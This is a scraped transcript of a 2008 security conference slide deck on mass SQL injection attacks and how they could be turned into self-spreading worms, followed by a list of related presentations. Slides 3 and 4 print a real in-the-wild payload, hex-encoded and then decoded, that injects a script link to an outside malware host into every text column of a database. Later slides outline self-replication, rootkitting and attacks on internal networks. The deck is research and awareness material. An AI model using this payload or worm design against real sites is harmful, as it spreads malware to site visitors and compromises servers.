Presentation is loading. Please wait.

Presentation is loading. Please wait.

©2008 Gotham Digital Science SQL Injection Worms for Fun & Profit Justin Clarke, Andrew Carey Nairn.

Published byShana Fleming Modified over 9 years ago

Similar presentations

Presentation on theme: "©2008 Gotham Digital Science SQL Injection Worms for Fun & Profit Justin Clarke, Andrew Carey Nairn."— Presentation transcript:

1 ©2008 Gotham Digital Science SQL Injection Worms for Fun & Profit Justin Clarke, Andrew Carey Nairn

2 2 ©2008 Gotham Digital Science Overview  The mass SQL Injection(s) earlier this year  Why it could have been worse  Demo  What its not –Any revelation of secret SQL injection fu we don’t already know about –Anything discovered in the last 7-10 years

3 3 ©2008 Gotham Digital Science In the Wild /page.asp?foo=’;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C4 15245204054205641524348415228323535292C404320564152434841522832353529 204445434C415245205461626C655F437572736F7220435552534F5220464F5220534 54C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747 320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414 E4420612E78747970653D27752720414E442028622E78747970653D3939204F52206 22E78747970653D3335204F5220622E78747970653D323331204F5220622E7874797 0653D31363729204F50454E205461626C655F437572736F72204645544348204E4558 542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494 C4528404046455443485F5354415455533D302920424547494E20455845432827555 044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28 434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27 273C736372697074207372633D687474703A2F2F7777772E696273652E72752F6A73 2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D20 5461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205 461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F 7220%20AS%20VARCHAR(4000));EXEC(@S);--

4 4 ©2008 Gotham Digital Science In the Wild DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FORSELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id ANDa.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@CWHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@ C+']))+'' ''') FETCH NEXT FROM Table_CursorINTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursorhttp://www.ibse.ru/js.js

5 5 ©2008 Gotham Digital Science Why isn’t this as bad as it could be?  Profit –Aim is to install malware –But what about corporate systems? –What about installing rootkits on arbitrary DMZ’d/internal systems? –What about internal sites?

6 6 ©2008 Gotham Digital Science Why isn’t this as bad as it could be?  Foothold –Updates database content with malicious scripting links –What about leveraging OS access? –What about leveraging database functionality (i.e. linked databases)?

7 7 ©2008 Gotham Digital Science Why isn’t this as bad as it could be?  Spread –Uses Google, through a tool, to locate targets –What about self replication? –What about intranet/extranet replication?

8 8 ©2008 Gotham Digital Science Worms, weaponized  Self replicate, multiple methods (Google, MSN, Yahoo, direct scanning of RFC 1918 addresses)  Attack both URL and forms, keep simple state  Rootkit the underlying OS, dial home  Attack internal systems via the network

9 9 ©2008 Gotham Digital Science Demo 192.168.119.5192.168.119.6192.168.119.7192.168.119.8 Virtual Machine

10 10 ©2008 Gotham Digital Science Demo  Limited in the following ways –SQL Server only, no Oracle, MySQL, Sybase, DB2 etc –Doesn’t use privilege escalation attacks –Limits itself to RFC 1918 IPs

11 11 ©2008 Gotham Digital Science Recent Resources  Scrawler (HP) –http://www.communities.hp.com/securitysoftware/blo gs/spilabs/archive/2008/06/23/finding-sql-injection- with-scrawlr.aspx  Microsoft Source Code Analyzer for SQL Injection –http://blogs.msdn.com/sqlsecurity/archive/2008/06/2 4/microsoft-source-code-analyzer-for-sql-injection- june-2008-ctp.aspx  Microsoft URLScan 3.0 beta

12 12 ©2008 Gotham Digital Science Contact  Justin Clarke - justin @ gdssecurity. com  Andrew Carey Nairn – andrew @ gdssecurity. com  Gotham Blog - http://ww.gdssecurity.com/l/b

Download ppt "©2008 Gotham Digital Science SQL Injection Worms for Fun & Profit Justin Clarke, Andrew Carey Nairn."

Similar presentations

Patch Management Patch Management in a Windows based environment

Patch Management Patch Management in a Windows based environment
Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.

Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Company Confidential 1 © 2005 Nokia DBUpgradeTool_1-2005.ppt / 2005-09-20 / JMa A Database Upgrade Tool Nokia Networks Jukka Maaranen.

Company Confidential 1 © 2005 Nokia DBUpgradeTool_ ppt / / JMa A Database Upgrade Tool Nokia Networks Jukka Maaranen.
Copyright © 2012 Certification Partners, LLC -- All Rights Reserved Lesson 4: Web Browsing.

Copyright © 2012 Certification Partners, LLC -- All Rights Reserved Lesson 4: Web Browsing.
March 2011 LizaMoon SQL Injection Attack Lessons Learnt From a Close Call And How to Protect Your Site

March 2011 LizaMoon SQL Injection Attack Lessons Learnt From a Close Call And How to Protect Your Site
Lesson 4: Web Browsing.

Lesson 4: Web Browsing.
 Population: N=100,000  Scan rate  = 4000/sec, Initially infected: I 0 =10  Monitored IP space 2 20, Monitoring interval:  = 1 second Infected hosts.

 Population: N=100,000  Scan rate  = 4000/sec, Initially infected: I 0 =10  Monitored IP space 2 20, Monitoring interval:  = 1 second Infected hosts.
By Joshua T. I. Towers. 13.3 $13.3 billion was the direct cost of malware for business in 2006 “direct costs are defined as labor costs to analyze, repair.

By Joshua T. I. Towers $13.3 billion was the direct cost of malware for business in 2006 “direct costs are defined as labor costs to analyze, repair.
Worms By: Aaron Stahler. Difference Between a Worm and A Virus Viruses are computer programs that are designed to spread themselves from one file to another.

Worms By: Aaron Stahler. Difference Between a Worm and A Virus Viruses are computer programs that are designed to spread themselves from one file to another.
Automated Web Patrol with Strider HoneyMonkeys Present by Zhichun Li.

Automated Web Patrol with Strider HoneyMonkeys Present by Zhichun Li.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
Internet Explorer 7 Security Features Steve Lamb Technical Security Microsoft Ltd

Internet Explorer 7 Security Features Steve Lamb Technical Security Microsoft Ltd
Varun Sharma Security Engineer | ACE Team | Microsoft Information Security

Varun Sharma Security Engineer | ACE Team | Microsoft Information Security
Web-Based Malware Menace Spreading Fast Garry Bennett Marcelo Berger Kelley Gambera Elsa Madrigal David Pessis Chuck Roth Fred Salchli Presented By:

Web-Based Malware Menace Spreading Fast Garry Bennett Marcelo Berger Kelley Gambera Elsa Madrigal David Pessis Chuck Roth Fred Salchli Presented By:
Migrating to EPiServer CMS 5 Johan Björnfot -

Migrating to EPiServer CMS 5 Johan Björnfot -
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
© 2010 Quest Software, Inc. ALL RIGHTS RESERVED Understanding and Preventing SQL Injection Attacks Kevin Kline, Technical Strategy Manager

© 2010 Quest Software, Inc. ALL RIGHTS RESERVED Understanding and Preventing SQL Injection Attacks Kevin Kline, Technical Strategy Manager
Security and Risk Management. Who Am I Matthew Strahan from Content Security Principal Security Consultant I look young, but I’ve been doing this for.

Security and Risk Management. Who Am I Matthew Strahan from Content Security Principal Security Consultant I look young, but I’ve been doing this for.

Similar presentations

Ads by Google